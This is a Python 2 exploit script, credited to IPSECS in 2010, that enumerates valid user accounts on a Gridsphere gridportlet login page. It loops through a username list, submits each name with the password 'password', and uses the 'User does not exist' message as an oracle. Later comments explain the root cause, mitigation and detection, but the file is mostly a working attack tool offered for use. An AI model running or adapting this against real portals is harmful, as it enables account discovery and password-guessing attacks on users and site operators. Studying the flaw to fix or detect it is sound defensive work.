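#!/usr/bin/python
# Gridsphere - gridportlet remote user enumeration exploit
# Copyright IPSECS (c) 2010 http://ipsecs.com
# Thanks to underground people who gives idea about python and javascript
# You know who you are :-)
#
# Python 2 script (urllib2 and ClientForm are Python 2 only).
#
# Root cause, as shown by the check below: the login page answers an unknown
# account with the text "User does not exist", while any other failure gets a
# different response. That difference is an account-existence oracle.
# Mitigation: return one generic failure message for every failed login and
# throttle repeated failures per source. Detection: a run of failed logins
# from one client that walks many usernames with the same constant password.

import sys,re,os
from urllib2 import urlopen
# You need to install ClientForm from this site
# http://wwwsearch.sourceforge.net/old/ClientForm
from ClientForm import ParseResponse

# Text the portal returns only when the submitted username is unknown.
UNKNOWN_USER_MARKER = "User does not exist"


def main():
    """Submit each name from a user list to the login form and label it.

    Command line: ``[URL Login] [User List File]``. The login page is
    fetched once, its forms are parsed, and the form at a fixed index is
    reused for every candidate. A candidate is printed as ``[INVALID]``
    when the response contains UNKNOWN_USER_MARKER and as ``[OK]``
    otherwise, so ``[OK]`` means only "the marker was absent", not a
    successful login.
    """
    # Single-argument print(...) behaves identically under Python 2.
    if len(sys.argv) != 3:
        print("Usage : python " + sys.argv[0] + " [URL Login] [User List File]")
        print("Example : python " + sys.argv[0] + " https://example.com/acgt/portal?cid=mptoolportlet1 users.txt")
        sys.exit(0)

    response = urlopen(sys.argv[1])
    forms = ParseResponse(response, backwards_compat=False)
    # You have to modify the index in some cases!
    # Try to print what is inside forms[0] forms[1] forms[2] etc
    form = forms[2]

    # The original left the list file open and shadowed the builtin `input`;
    # the context manager closes the handle even if a request raises.
    with open(sys.argv[2], "r") as user_list:
        for user in user_list:
            candidate = user.rstrip()
            # The previous field values were read into an unused local;
            # only the assignments matter.
            form["username"] = candidate
            form["password"] = "password"
            result = urlopen(form.click()).read()
            # The marker is a plain literal, so a substring test is
            # equivalent to the original re.search() call.
            if UNKNOWN_USER_MARKER in result:
                print("[INVALID] " + candidate)
            else:
                print("[OK] " + candidate)


if __name__ == '__main__':
    main()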